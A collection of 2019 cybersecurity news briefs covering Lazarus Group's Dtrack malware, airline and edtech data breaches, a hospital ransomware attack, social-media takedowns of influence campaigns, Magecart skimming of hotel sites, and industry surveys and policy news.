Cyber Risk News
The infamous Lazarus Group is behind new malware discovered targeting ATMs and back-office systems in Indian banks and research centers, according to Kaspersky.
The Russian AV vendor claimed in a new report that it discovered the ATMDtrack malware back in late summer 2018. It is designed to sit on targeted ATMs and effectively skim the details of cards as they are inserted into the machine.
However, digging a little deeper, the researchers found another 180+ new malware samples similar to ATMDtrack but which were not designed to target ATMs.
Collectively, these Dtrack malware tools seem to be focused on information theft and eavesdropping, via functionality such as: keylogging; retrieving browser history; gathering host IP addresses and network info; and listing all running processes and files.
The dropper also contained a remote access trojan (RAT) to give attackers complete control over a victim’s machine.
Kaspersky claimed the Dtrack malware shares similarities with the DarkSeoul campaign of 2013, also linked to North Korea’s Lazarus Group, which disrupted computers at a South Korean bank and three TV stations, as well as countless ATMs.
“We first saw early samples of this malware family in 2013, when it hit Seoul. Now, six years later, we see them in India, attacking financial institutions and research centers,” noted the report. “And once again, we see that this group uses similar tools to perform both financially motivated and pure espionage attacks.”
However, Dtrack attackers would need to take advantage of weak network security policies, weak password policies, and a lack of traffic monitoring. So by addressing these issues and putting in place reputable AV featuring behavior-based tools, as well as regular security training and IT audits, organizations could repel the threat, said Kaspersky.
“The vast amount of Dtrack samples we found demonstrate how Lazarus is one of the most active APT groups, constantly developing and evolving threats in a bid to affect large-scale industries. Their successful execution of Dtrack RAT proves that even when a threat seems to disappear, it can be resurrected in a different guise to attack new targets,” said Kaspersky security researcher, Konstantin Zykov.
“Even if you are a research center, or a financial organization that operates solely in the commercial sector with no government affiliates, you should still consider the possibility of being attacked by a sophisticated threat actor in your threat model and prepare respectively.”
A budget Asian airline group has revealed that two former employees of a third-party provider were responsible for a massive breach exposing around 35 million records.
The records — which contained names, dates of birth, phone numbers, emails, addresses, passport numbers and expiration dates — were spotted circulating on the dark web last month, although the breach only came to light last week.
They belonged to passengers of Malaysia’s Malindo Air and Thai Lion Air, which operate under parent group Lion Air.
Initial reports suggested a misconfigured Amazon Web Services (AWS) S3 bucket may have been to blame for the security incident, but AWS has since confirmed that its “services and infrastructure worked as designed and were not compromised in any way.”
Malindo Air yesterday clarified that two former workers at its e-commerce provider GoQuo in a development center in India “improperly accessed and stole the personal data of our customers.”
“Malindo Air has been working closely with all the relevant agencies including the Malaysian Personal Data Protection Commissioners and the National Cyber Security Agency (NACSA) as well as their counterparts overseas,” it added in a statement.
“Malindo Air wishes to reiterate that this incident is not related to the security of its data architecture or that of its cloud provider Amazon Web Services. All its systems are fully secured and none of the payment details of customers were compromised due to the malicious act.”
Robert Ramsden-Board, VP EMEA at Securonix, argued that detecting malicious insider behavior in the supply chain is extremely difficult.
“Organizations need to assess their suppliers’ cybersecurity, ensuring that they have appropriate measures in place to detect unauthorized activity by external and internal actors,” he added.
“They also need to properly vet all third-party suppliers before onboarding and establish boundaries on what a supplier can access with immediate alerts on any attempts to access or download off-limits or customer data.”
Healthcare in Wyoming has been seriously disrupted after a ransomware attack brought down the computer systems of Campbell County Health.
Campbell County Health (CCH), which is based in Gillette, includes Campbell County Memorial Hospital, a 90-bed acute-care community hospital; Campbell County Medical Group, with nearly 20 clinics; The Legacy Living & Rehabilitation Center long-term care center; and the Powder River Surgery Center.
All of CCH's 1500 computers and its email server were affected by the attack, which took place on Friday morning, September 20. As a result, surgeries have been canceled, and new inpatient admissions have ceased.
All of today's appointments in the cancer center's radiation oncology department were canceled, and no outpatient lab, respiratory therapy, blood draws, or radiology exams or procedures are being carried out.
The attack prompted the hospital to go "on full divert," meaning patients arriving at the emergency room or walk-in clinic are triaged then transferred to an alternative care facility, if needed.
Other hospitals in the region have been informed of the situation and are working with CCH to provide urgent care, although two of them, Casper and Rapid City, were already full when news of the attack broke.
A press release issued by CCH on Friday afternoon stated: "Campbell County Health has been the victim of a ransomware attack. All CCH computer systems have been affected, which impacts the organization’s ability to provide patient care.
"The appropriate authorities have been notified, and efforts are underway to restore the affected systems. Information on CCH services will be updated as soon as information becomes available."
CCH said that the attack had not compromised any patient data.
A CCH spokesperson said on Friday: "At this point in time, there is no evidence that any patient data has been accessed or misused. The investigation is ongoing, and we will provide updates when more information becomes available. We are working diligently to restore complete access to our services."
As of Sunday, Campbell County Memorial Health's maternal child department had begun accepting patients again on a case-by-case basis. It is not yet clear when CCH services will be back to normal.
A CCH spokesperson said: "We are collaborating with the local, state, and federal authorities to address this unfortunate incident securely and as quickly as we can. We are very thankful for the local support from the City of Gillette, Campbell County Commissioners, [and] Campbell County Emergency Management."
The role of chief information security officer (CISO) is being treated with newfound respect, according to research by a security solutions integrator.
The results, published today, show that 96% of respondents think that senior executives have a better understanding of cybersecurity than they did five years ago, and 67% said the business they worked for prioritized cybersecurity above all other business considerations.
Interestingly, 58% of CISOs reported that their job prospects had improved after they experienced a data breach. In fact, most respondents thought that the career path of a CISO was today more illustrious than ever.
Of the CISOs surveyed, 76% felt that cybersecurity risk was now so important to businesses that CISOs would start being promoted to the role of CEO. Not bad for a relatively new role in the corporate executive hierarchy.
"The Chief Information Security Officer has traditionally reported to the CIO because the job has been regarded as primarily technical. However, the current epidemic of breaches coupled with privacy regulations like the GDPR and CCPA has made cybersecurity a tier-1 business risk," wrote researchers for Optiv.
According to Optiv’s practice director of risk management & transformation, Mark Adams, CISOs have many qualities that would make them great in the role of CEO. He said: "The CISO exhibits a mastery of negotiation by actively listening and applying the disciplines of consensus-building among his peers and subordinates. The effective CISO thinks more strategically than tactically, planning for the long term and what organizational conditions must be managed to achieve success."
But before CISOs ascend the ranks they have some serious work to do, especially in the US, which the research shows lags behind the UK when it comes to practicing what to do in the event of a cyber-attack.
Adams said: "UK-based organizations report a significantly higher frequency of rehearsing their incident response plans. It is a bit surprising that 36% of US-based companies reported exercising their plans less than once per year, particularly given the adverse impact that perceived negligence can have on the brand/reputation of the organization."
New research has shown that cybercrime really does pay, but not for the people you'd expect.
A study conducted by a company review site to find out which firms are the most generous when it comes to remuneration found that the best-paying gig was to be had at an American multinational cybersecurity company.
Glassdoor's list of the 25 highest-paying companies in the US for 2019 was topped by Palo Alto Networks, which has its headquarters in Santa Clara, California. The cybersecurity firm, which employs over 5,000 people around the world, rewards workers for their efforts with a median total salary of $170,929. This figure dwarfs the Bay Area's average median base pay, which is $73,128.
After reporting a 29% year-over-year increase in revenue for the 2018 fiscal year, in which they made $2.3bn, Palo Alto Networks certainly has the cash to splash. Such bountiful paychecks are likely to have been a contributing factor when Palo Alto Networks was ranked number one as "best place to work" in the Bay Area by SF Business Times in 2016.
"Not surprisingly, tech companies dominate the list of high-paying employers, including companies like Twitter, Google, and LinkedIn," Glassdoor's researchers wrote. "The three highest-paying employers in 2019 were all tech companies paying a median total salary over $160,000 a year."
In fact, every one of the top ten highest-paying companies was tech related. Second after Palo Alto Networks was NVIDIA, which has more than 50 offices worldwide and is also based in Santa Clara. The median total salary NVIDIA pays employees is $170,068.
The list of highest-paying companies was drawn from data reported to Glassdoor between July 1, 2018, and June 30, 2019, by employees based in the US. The information reported included details on base pay and other forms of compensation, including commissions, tips, and bonuses. To be considered for the report, companies had to have received at least 75 salary reports during this timeframe.
Though tech companies are leading the way on median pay, researchers found that the highest-paid jobs are in the field of medicine. Physicians topped Glassdoor's list of the 25 highest-paying roles in the US for 2019, earning a median base salary of $193,415.
However, Steve Durbin, managing director of the Information Security Forum, a London-based authority on cyber, information security, and risk management, thinks that doctors may lose their spot at the top to a future gatekeeper of cybersecurity.
Durbin said: "Our digital world today runs on shared data and networks, and it relies on the public trust. Security professionals are the protectors of these assets. Moving forward, organizations should rise above the hiring fray and focus on fresh, strategic, long-term approaches to building, supporting, and integrating the security workforce.
"Security professionals are key to the future and their skill sets may very well push their profession to the top of the salary list."
Twitter has removed another 10,000 accounts across six countries after discovering coordinated activity among nation states designed to spread misinformation.
The move comes nearly a year after the social network first began efforts at uncovering state-sponsored propaganda efforts using fake accounts. Since then, it has announced new discoveries in January, June and August this year.
Chinese efforts to spread misinformation about Hong Kong’s pro-democracy protesters appears to be showing no signs of slowing down. On top of the network of 200,000 fake accounts disclosed in August, Twitter has added another 4301 which it said were attempting to “sow discord” about the protests.
Elsewhere, 4248 accounts were suspended in the UAE for “often employing false personae and tweeting about regional issues, such as the Yemeni Civil War and the Houthi Movement.”
A further network of 271 accounts in Egypt and the UAE were focused on spreading misinformation about Qatar and other countries such as Iran.
Twitter also suspended 1019 fake accounts in Ecuador linked to the PAIS Alliance party for a propaganda operation supporting President Moreno’s administration.
A further 259 accounts were suspended in Spain, once again linked to a major political party – this time the right-wing Partido Popular.
As per previous culls, Twitter has permanently suspended the flagged accounts and made available an archive of removed tweets for researchers to study.
“Nearly one year on, the archive is now the largest of its kind in the industry. Thousands of researchers have made use of these data sets that contain millions of individual Tweets and more than one terabyte of media. Using our archive, these researchers have conducted their own investigations and shared their insights and independent analyses with the world,” the firm explained.
“Transparency and openness are deep-seated values at the heart of Twitter which define and guide our methodology around these disclosures. Going forward, we will continue to enhance and refine our approach to disclosing state-affiliated information operations on our service.”
Online education platform Thinkful has suffered a data breach which may have given hackers access to users' accounts.
The training site for developers notified all of its users by email that an unspecified number may have had their “company credentials” accessed by an unauthorized third party.
However, it clarified that no government identification or financial info belonging to the company would have been available to the hackers via this route. “As soon as we discovered this unauthorized access we promptly changed the credentials, took additional steps to enhance the security measures we have in place, and initiated a full investigation,” it continued.
“Additionally, at this time we have no evidence of any unauthorized access to any other Thinkful user account data or user information. However, as a measure of added precaution, we are requiring all users to reset their Thinkful passwords.”
The cause of the breach is still unclear, although a phishing attack against a site admin or a credential stuffing raid are among the usual suspects. Also unclear is the number of users affected and when the incident occurred.
It does come at an awkward time for Thinkful, however, given the firm only recently announced its $80m acquisition by student learning platform provider Chegg.
That firm has also been on the receiving end of unwanted attention from the black hat community: last year it revealed in a regulatory filing that hackers managed to access a company database, stealing log-ins, and email and shipping addresses.
It was forced to reset 40 million passwords as a result.
Securonix VP EMEA, Robert Ramsden Board, argued that the incident highlights the importance of due diligence before buying a company.
“Purchasing a company that has taken a lax approach to security will only come back to haunt the buyer, as Marriott learned the hard way after its purchase of Starwood hotels,” he added.
“Data breaches pose a serious reputational and business risk to organizations. Therefore, to avoid unauthorized access to internal systems organizations should simulate data breach security drills to identify weaknesses that could be exploited and train staff on the malicious tactics cyber-criminals use to reduce the risk of human error.”
Facebook has removed tens of thousands of apps from hundreds of developers as the fallout from the Cambridge Analytica scandal continues.
In March last year it was revealed that the shadowy political consultancy got hold of the personal details of over 50 million users of a Facebook app after its developers broke the social network’s rules on data collection.
As part of its $5bn settlement with the FTC, Facebook promised greater oversight of its developer ecosystem to ensure a repeat incident could not occur.
According to Facebook VP of product partnerships, Ime Archibong, the tens of thousands of suspended apps are linked to around 400 developers.
“We initially identified apps for investigation based on how many users they had and how much data they could access. Now, we also identify apps based on signals associated with an app’s potential to abuse our policies,” he explained.
“Where we have concerns, we conduct a more intensive examination. This includes a background investigation of the developer and a technical analysis of the app’s activity on the platform. Depending on the results, a range of actions could be taken from requiring developers to submit to in-depth questioning, to conducting inspections or banning an app from the platform.”
Although many of the suspended apps were still in their test phase and did not pose an immediate threat to user privacy, they were still suspended if they didn’t meet Facebook rules and/or if the developer failed to respond to a request for further information.
Some were banned outright if they inappropriately shared Facebook data, made it publicly available without protecting users’ identities, or otherwise violated policies.
These include myPersonality, whose developers stored psychology profiles for millions of users on a poorly secured site for years. Archibong also revealed that Facebook is suing South Korean data analytics firm Rankwave, as well as LionMobi and JedMobi, which are apps linked to malware distribution.
Aside from the ongoing App Developer Investigation, Facebook claims to have made improvements to its developer oversight, including removing APIs, enhancing its number of investigators, and introducing new rules to restrict developers’ control over user data.
In a new project announced by IBM Security on September 17, the American multi-national IT company will provide technologies and data that will give the city's commercial movers and shakers an edge in the event of a cyber-attack.
As part of the project, business owners will be able to access two new free tools made available by the LA Cyber Lab, a non-profit providing threat intelligence to local businesses.
The first tool is a mobile application that any citizen can use to submit and analyze suspicious emails to determine their risk and if they are phishing attacks. The second tool, and the real centerpiece of this collaborative effort, is the cloud-based Threat Intelligence Sharing Platform (TISP), developed in collaboration with TruSTAR.
Functioning as a kind of digital neighborhood watch, TISP will allow users to circulate their spear-phishing concerns and educate themselves on the latest business email compromise (BEC) or ransomware campaigns.
A neat feature of the platform is that it reviews suspicious emails submitted by users, extracting key information and searching over 25 common and unique data sources, to indicate the level of risk posed. It can also correlate key information in the email to the associated threat group and their latest attack campaign.
"Public safety in the 21st century isn't just about protecting our physical streets and neighborhoods—we need to protect the digital presence that is part of everyday life for our residents and businesses," said Los Angeles' mayor, Eric Garcetti.
"The Threat Intelligence Sharing Platform and mobile app will advance the LA Cyber Lab's work that has made our city a national cybersecurity model, all while better defending Angelenos from cyber-threats."
In a bid to help other cities in the US know what to do in the event of a cyber-attack, IBM is hosting three complimentary training sessions for municipalities in the IBM X-Force Command Cyber Range in Cambridge, Massachusetts.
At each of the sessions, which will take place on October 22, November 19, and December 10, 2019, attendees will experience a simulated attack in order to practice their response.
The attack may be simulated, but the threat is very real. In this year alone, more than 70 American cities have become the victims of ransomware.
Kevin Albano, associate partner, IBM Security Services, IBM Security, said: "While a collaboration like this takes time and the right partners, the process itself was refreshing as a result of the city’s eagerness and dedication to improving cybersecurity for the area. The development of the LA Cyber Lab two years ago was the first real push in the right direction, and the development of these solutions is only continuing that goal and leading the charge for other cities to become more prepared."
A lack of security on WeWork's WiFi network has left sensitive user data exposed.
In August, Fast Company revealed that WeWork had used the same WiFi password at many of its rentable shared co-working spaces for years, a password that appears in plain text on WeWork's app.
The security of the real estate company's WiFi came under further criticism yesterday when CNET reported that the network's poor security had left sensitive data of WeWork users exposed.
Evidence of the exposure was provided by Teemu Airamo, who has been routinely running security scans on WeWork's WiFi network since May 2015. Airamo's scans, which were reviewed by CNET, show nearly 700 devices, including servers, computers, and connected appliances, leaking bank account credentials, email addresses, ID scans, and client databases, among other data.
Airamo said that multiple attempts made by him to alert WeWork's upper management to the security problem were met with indifference.
WeWork has around 527,000 members renting out its 833 spaces in 125 cities around the world. The company filed for an initial public offering (IPO) in 2018. However, earlier this week the IPO was postponed until the end of the year after the company's reported valuation fell from $47 billion to under $20 billion.
A spokesperson for WeWork said: "WeWork takes the security and privacy of our members seriously, and we are committed to protecting our members from digital and physical threats. In addition to our standard WeWork network, we offer members the option to elect various enhanced security features, such as a private VLAN, a private SSID, or a dedicated end-to-end physical network stack.
"We are in a quiet period and can't comment beyond this statement."
Commenting on this report, Craig Young, computer security researcher for Tripwire’s Vulnerability and Exposure Research Team, said: "For the most part, as people connect to networks with shared passphrases, they are opening their devices up to be tricked onto a rogue wireless network where the attacker can connect to exposed file sharing services and tamper with connections to load fake websites.
"My recommendation for concerned WeWork customers is to set up a VPN for their own private use."
The US Air Force is requesting quotes from vendors that can provide support for a cybersecurity project under a contract worth up to $95m.
Vendors of any size are being sought to support an experimental cybersecurity platform development team that is part of the Air Force's LevelUP program.
The team's engineers are looking for vendors that can give them access to a secure DevOps platform in which they can build and test new products. Testing will be conducted at every security level and classification on private, public, and hybrid clouds.
Bidding vendors will need to prove that their company can process data securely at the second-highest security level for Defense Department systems, impact level five.
To provide the development team with the support it requires, vendors will have to access classified information, something they cannot do from their local cafe over a cappuccino. Vendors will only be considered for this valuable contract if they have access to a facility with a secret level of security clearance that they can use when they need to handle classified data.
A Blanket Purchase Agreement (BPA) for up to 15 cloud vendors is being drawn up by the Air Force Life Cycle Management Center, with a performance period of up to five years. To be eligible to receive a BPA, companies must be based in the United States with no foreign ownership or control.
Bidders have until 12:00 PM CST on October 16, 2019, to submit a quote via email. Two Ask Me Anything (AMA) sessions are planned for September 25 and October 3; however, times and locations are yet to be announced.
The LevelUP program, which is based at the Command, Control, Communications, Intelligence, and Networks Directorate Joint Base in San Antonio, Texas, was founded with the strategy to create two main products.
One product, Unified Platform, is a tool that aggregates cybersecurity incident data in a single platform that is visible not just across the Air Force, but to other military branches too. The other is LevelUP Cyber Works, a “cyber factory” in which to develop and field new capabilities at the speed and scale required in today’s cyberspace operations environment.
In a surprise u-turn, senate Republicans have decided to back Democrat calls for an extra $250m to enhance the security of the nation’s voting infrastructure.
Speaking on the floor yesterday, senate majority leader Mitch McConnell said: “I’m proud the Financial Services & General Government bill will include a bipartisan amendment providing another $250 million for the administration and security of their elections, to help states improve their defenses and shore up their voting systems.”
Republicans have twice blocked attempts to bring legislation to the floor designed to improve election security, in 2018 and then again in July this year. Both times they claimed that states had still not spent the $380m they were given in 2018.
“This morning, after months and months and months of Republican resistance, and months of insistent Democratic pressure, senate Republicans have finally agreed to support our Democratic request for additional election security funding in advance of the 2020 elections,” responded senate minority leader, Chuck Schumer.
“A year ago, our Republican friends unfortunately and short-sightedly rejected this amendment. Well, maybe, just maybe, they are starting to come around to our view that election security is necessary; that if Americans don’t believe their elections are on the up-and-up, woe is us as a country and as a democracy.”
However, even this sum may not be enough to provide the safeguards needed to improve resilience against possible Russian intrusions.
Marian Schneider, president of election transparency non-profit VerifiedVoting, argued that more is needed to help states shore up their security ahead of the 2020 Presidential election.
“This amount falls short of the $600m that passed in the House, which is much closer to meeting the need for proper investment in election security. Congress has the obligation to protect the country from threats to national security and has the opportunity to act on this nonpartisan issue — after all, everyone votes on the same equipment,” she added.
“By making federal funds available, states will be able to replace aging, insecure voting equipment and implement modern security best practices, which include using voter-marked paper ballots and robust post-election audits. Despite the progress shown today, congress still needs to vote on bipartisan, comprehensive election security legislation to protect and ensure trustworthy elections backed by adequate funds for state and local governments to implement such measures.”
A senate report from July warned that Russian hackers had likely compromised voting infrastructure in all 50 states ahead of the 2016 election.
Nearly 80% of global organizations now rank cyber-risk as a top-five business concern, but just 11% are highly confident they can assess, prevent and respond effectively to attacks, according to new research from Marsh and Microsoft.
The insurer has teamed up with the computing giant once again to poll 1500 global organizations for its 2019 Global Cyber Risk Perception Survey.
It found those ranking cyber-risk as a top-five concern had risen from 62% in 2017 to 80% this year, while those confident in being able to deal with a threat fell from 19% to 11% over the period.
Ownership of and engagement with cyber-risk management seems to be a key challenge for many.
Although 65% of respondents identified a senior executive or the board as main owner of this function, only 17% of executives and board members said they’d spent more than a few days in the past year focusing on the issue. Some 51% spent several hours or less.
Similarly, 88% of organizations identified their IT/IT security teams as primary owners of cyber-risk management, but nearly a third (30%) of IT respondents said they spent just a few days or less over the past year focusing on this.
At the same time, adoption of new technologies continues apace, often without adequate safeguards.
Half of respondents said cyber-risk is almost never a barrier to the adoption of new tech, and although three-quarters (74%) evaluate risks prior to adoption, just 5% said they do so throughout the technology lifecycle. A significant minority (11%) do not perform any evaluation.
The report also revealed that organizations were likely to hold their own cyber-risk management actions to a higher standard than that of their suppliers.
That’s despite the fact that 39% said the risk posed by their partners was high or somewhat high versus just 16% who admitted their own organization poses high risk to their supply chain.
“We are well into the age of cyber-risk awareness, yet too many organizations still struggle with creating a strong cybersecurity culture with appropriate levels for governance, prioritization, management focus, and ownership,” said Kevin Richards, global head of cyber-risk consulting at Marsh.
“This places them at a disadvantage both in building cyber-resilience and in confronting the increasing complex cyber-landscape.”
Two individuals have been indicted as part of a crackdown on a $10m tech support scam operation.
Romana Leyva and Ariful Haque have now been charged with one count of wire fraud and one count of conspiracy to commit wire fraud, which could land them with a maximum 40 years each behind bars, according to an unsealed indictment.
It alleges that the fraud ring operated a classic tech support scam campaign targeting mainly elderly computer users.
After seeing pop-ups appear on their screens warning of a serious virus infection, they were urged to call a tech support number. Often these windows were branded with legitimate corporate logos to enhance legitimacy.
Doing so would take them through to an Indian call center, where operatives would use remote access tools to investigate the ‘problem’ before charging a fee — one-time, one-year or lifetime — to the victim and installing free anti-virus on their machine.
Around 7500 North American victims were scammed in this way, losing hundreds or thousands of dollars each.
In some cases, the fraudsters came back for more, claiming the original company that promised to provide tech support was going out of business and they wanted to refund the victim.
During this 'refund' process, they claimed to have reimbursed the victim too much money by accidentally adding an extra zero onto the amount. They then demanded the victim reimbursed them to the tune of thousands of dollars via gift cards, according to the indictment.
Nevada resident Leyva and New York-based Haque are accused of creating multiple fake companies to receive the fraudulently obtained funds, and of recruiting others to do so.
The scheme is said to have lasted from at least March 2015 to December 2018.
A report from Microsoft last year revealed that 63% of consumers globally experienced a tech support scam, down slightly from 68% in 2016.
Eight years ago, a list of the world's most dangerous software errors was published by problem-solving nonprofit the MITRE Corporation. Yesterday saw the long-awaited release of an updated version of this rag-tag grouping of cyber-crime's most wanted.
The Common Weakness Enumeration (CWE) Top 25 Most Dangerous Software Errors list (CWE Top 25) is a roundup of the most widespread and critical weaknesses that can lead to serious vulnerabilities in software.
What makes these bad boys so lethal is that they are often easy to find and exploit. And once attackers have gotten their grappling hooks into the errors, they are frequently able to completely take over execution of software, steal data, or prevent the software from working.
Each error was given a threat score to communicate its level of prevalence and the danger it presents. Topping the table of treachery with a threat score of 75.56 and leading by a huge margin is "improper restriction of operations within the bounds of a memory buffer."
The second-most lethal error was determined to be "improper neutralization of input during web page generation," also known as cross-site scripting, which had a threat score of 45.69.
In 2011, a subjective approach based on interviews and surveys of industry experts was used to create the list. In 2019, the list's compilers took a data-driven approach, leveraging National Vulnerability Database (NVD) data from the years 2017 and 2018, which consisted of approximately 25,000 CVEs.
MITRE's goal is to release an updated list each year based on data from that specific year. Asked why the gap between the first two lists was so long, a MITRE spokesperson answered: "Based on the previous methodology employed for the 2011 CWE Top 25 List, it was clear that there was no basis upon which to credibly change the list.
"As new methodologies were explored, and upon selection of the current data-driven approach, it became valuable to produce a new list because it would validate whether or not the new data-driven methodology would result in a different list. And, since it did result in a different list, community stakeholders now have a new list to consume that is evidence-based and different from the 2011 list."
The lists are indeed different, but both include some of the same offenders. Explaining why, the spokesperson said: "Significant work remains in the community to educate developers, improve analysis tools, and for consumers of software products to understand that weaknesses exist, and that they have the ultimate leverage with respect to evaluating products and selecting those products that deliberately work weaknesses out.
"Effective security can exist only if a broad number of stakeholders demand that it does. The 2019 CWE Top 25 List is a tool that different stakeholders can use to understand what the most prevalent weaknesses are and how to orient themselves toward defending against them."
People using mobile apps to book hotel rooms for their vacations have been targeted by a skimming attack.
Research by cybersecurity company Trend Micro discovered that a series of incidents took place earlier this month in which the booking websites of two well-known hotel chains were hit by credit card–skimming malware known as Magecart.
Both websites affected were developed by Spanish company Roomleader. One of the impacted brands has 73 hotels in 14 countries and is comparable in size and geographical distribution to Exe Hotels. The other undisclosed chain has 107 hotels in 14 countries and is comparable in size and geographical distribution to Eurostars Hotels. Exe and Eurostars both have websites powered by Roomleader.
Attackers were able to pilfer data by replacing the original credit card form on the booking page of each website with a fake one, then stealing the data entered into the imposter form by the user. In this case, the thieves made off with users' names, email addresses, telephone numbers, credit card details, and hotel room preferences.
The researchers theorized that the reason why the attackers went to the trouble of creating a fake form may have been that the original form didn't ask users to fill in their credit card's card verification number, known as a CSC, CVV, or CV2.
To make the switch appear more legitimate, the digital bandits even prepared credit card forms in the eight different languages supported by the targeted hotel websites.
Trend Micro's findings follow the discovery of another Magecart-using group by the company back in May of this year. That group, known as Mirrorthief, compromised an e-commerce service provider used by American and Canadian universities.
Roger Grimes, data-driven defense evangelist at KnowBe4, commented: "There are companies and services, which any website or service can buy, that will not only monitor what is going on within any particular website, but proactively look for signs of maliciousness and notify website owners when something is amiss. Website and service owners don’t have to be surprised by things like this. They can proactively fight it. They just have to care enough to put the right controls in place."
Purchasing cyber insurance to protect your business from the ever-increasing number of threats will cost you more in Delaware than in any other US state.
A new study by business insurer AdvisorSmith has found that the average cost of annual cyber insurance in the Blue Hen State is 8.34% higher than the national average and a staggering 32.49% higher than its cost in the cheapest state for cyber insurance, Arizona.
Across America's 50 states and the District of Columbia, the cost of cyber insurance averaged out at $1,501 per year, or around $125 a month, but for Delaware business owners the price rose to $1,626.92 per year. In Arizona, where the cost of cyber insurance was 24.15% cheaper than the national average, policies were on average $1,139 per year.
The study was conducted using quote estimates gathered in August and September 2019, as well as rate filings supplied by over 50 insurance companies throughout America between January 2019 and September 2019.
Premiums nationwide ranged from as low as $544 to as high as $2,642 for comparable insurance coverage, based upon companies with moderate risks. The premiums were based upon liability limits of $1m, with a $10,000 deductible and $1m in company revenue.
North Carolina was the second most expensive state for cyber insurance, with an average annual cost of $1,611. At the other end of the scale, after Arizona, Michigan and Minnesota offered the cheapest cyber insurance.
Asked how the average cost of cyber insurance has changed since last year, AdvisorSmith's Adrian Mak said: "Premium increases in the cyber market are tracking at 5% or less, which is relatively stable for an insurance product."
The Marsh-Microsoft 2019 Global Cyber Risk Perception survey published yesterday found that only 17% of executives said they had spent more than a few days on cyber-risk over the past year. However, a little investment of time in their company's cybersecurity could save them money.
Mak said: "We are seeing insurance companies focus more on operational cybersecurity defenses, where they are raising premiums on companies that don’t address cybersecurity vulnerabilities, while charging less to companies that are following the latest cybersecurity best practices."
Describing how he expects the cyber insurance landscape to change going forward, Mak said: "The cyber insurance marketplace is expected to experience continued growth over the next decade. We expect more growth in the small and midsize business sector. Especially in small business policies, we are seeing cyber insurance bundled into package policies."
Facebook has taken down hundreds of Facebook and Instagram Pages and accounts after two separate coordinated campaigns were discovered attempting to influence user behavior in Iraq and Ukraine.
It’s possible that the fake news operations were an attempt to peddle misinformation ahead of elections in the Middle East nation last year and in the eastern European country a few months ago.
The social network removed 76 Facebook accounts, 120 Pages, one Group, two Events and seven Instagram accounts linked to “coordinated unauthentic behavior” in Iraq. One of more of the Pages managed to garner around 1.6 million followers while 339,000 accounts followed at least one of the groups, it said.
“The people behind this activity used fake accounts to amplify their content and manage Pages — some of which were likely purchased,” explained Facebook head of cybersecurity policy, Nathaniel Gleicher.
“Many of these Pages merged with one another and changed names over time. They also impersonated other people and used their IDs to conceal their identity and attempt to avoid detection and removal.”
The content itself was largely critical of the US occupation and pro-Saddam Hussein, according to an analysis by the Atlantic Council’s Digital Forensic Research Lab (DFRLab).
A much bigger operation was taken down in Ukraine, where Facebook was forced to remove 168 accounts, 149 Pages and 79 Groups. Around 4.2 million accounts followed one or more of these Pages and around 401,000 accounts joined at least one of the Groups, while a whopping $1.6 million was spent on Facebook and Instagram ads, the social network revealed.
Facebook linked the activity to Ukrainian PR firm Pragmatico, despite attempts to conceal its involvement.
“The people behind this activity used fake accounts to manage Groups and a number of Pages — some of which changed their names over time, and also to increase engagement, disseminate content and drive people to off-platform sites posing as news outlets,” explained Gleicher.
According to another DFRLab analysis, there may have been political intent behind this campaign, although it was also an attempt to build a national audience for media conglomerate Znaj Media Holdings, which is linked to Pragmatico.
“The pages primarily posted local Ukrainian news content, much of which was lifted from other Ukrainian news outlets with only partial attribution,” it concluded. “This network may have been partially politically motivated — some of the pages launched personal attacks against particular Ukrainian politicians — and partially commercial in nature.”
The Financial Services Information Sharing and Analysis Center (FS-ISAC) and Europol’s European Cybercrime Centre (EC3) have announced a partnership to combat cybercrime within the European financial services sector.
The FS-ISAC is an industry consortium dedicated to reducing cyber-risk in the global financial system, and the EC3 protects European citizens, business and governments from online crime.
The Memorandum of Understanding (MOU) between the two will aim to facilitate and enhance the law enforcement response to financially motivated cyber-criminals targeting banks and other financial institutions through a symbiotic intelligence sharing network.
The partnership is a response to the acceleration of sophisticated cyber-attacks in recent years affecting numerous countries and jurisdictions at once. The MOU will help foster a pan-European approach to intelligence sharing, ensuring the cross-border cooperation necessary for the detection, prevention and reduction of cybercrime. In addition to facilitating information sharing, the agreement will also enable education and resilience through training exercises and informational summits.
“Cyber-criminals are increasingly targeting financial services and institutions to the cost of citizens and businesses across the EU,” said Steven Wilson, head of EC3. “It is crucial to bring key stakeholders around the table to improve the coordinated response; this MOU with FS-ISAC builds a platform to allow us to do exactly that.”
Ray Irving, managing director of FS-ISAC, added: “Accelerated global digitalization combined with the growing sophistication of cyber-criminals demands a more concerted approach from both the public and private sector. Through a collaborative peer-to-peer network, FS-ISAC and EC3 are enabling intelligence sharing to better safeguard the global financial system.”
The UK’s National Cyber Security Centre (NCSC) has been forced to issue a new report detailing the threat to the country’s universities from cyber-criminals and nation state operatives.
The NCSC argued that, while the sector has traditionally been one of the most open and outward-facing, both in terms of culture and technology, this makes the attackers’ job even easier.
The main threats are from untargeted cybercrime raids, such as ransomware and bulk personal info theft via phishing, and targeted ones like Business Email Compromise (BEC). However, it also highlighted the challenge posed by nation state hackers looking to steal cutting-edge research and IP.
“While it is highly likely that cybercrime will present the most evident difficulties for universities, state-sponsored espionage will likely cause greater long-term damage. This is particularly true for those universities which prize innovation and research partnerships. This damage will extend to the UK’s larger national interest and to those researchers whose work may give others the chance to 'publish first',” the report argued.
“Nation states almost certainly target universities for the data and information they hold. Cyber offers a deniable route to obtain information that is otherwise unavailable to them. It is likely exploited instead of, or in conjunction with, traditional routes to gain access to research, such as partnering, ‘seconded students,' or direct investment.”
The NCSC warned that attacks on UK universities by nation states could even threaten the long-term health of the country itself.
“There's a realistic possibility that the threat will increase in-line with increased scrutiny of foreign direct investment and the minimizing of other avenues to gain insight and advantage,” it added.
The GCHQ spin-off urged university IT teams to focus on: improving user security awareness; enhancing access controls, especially for sensitive data stores; and to revisit network design to segment high-value information.
Iranian hackers have been among the most prolific attackers of university IT systems: just last week more info emerged on the Cobalt Dickens group, which is targeting at least 380 universities worldwide in a major new phishing operation.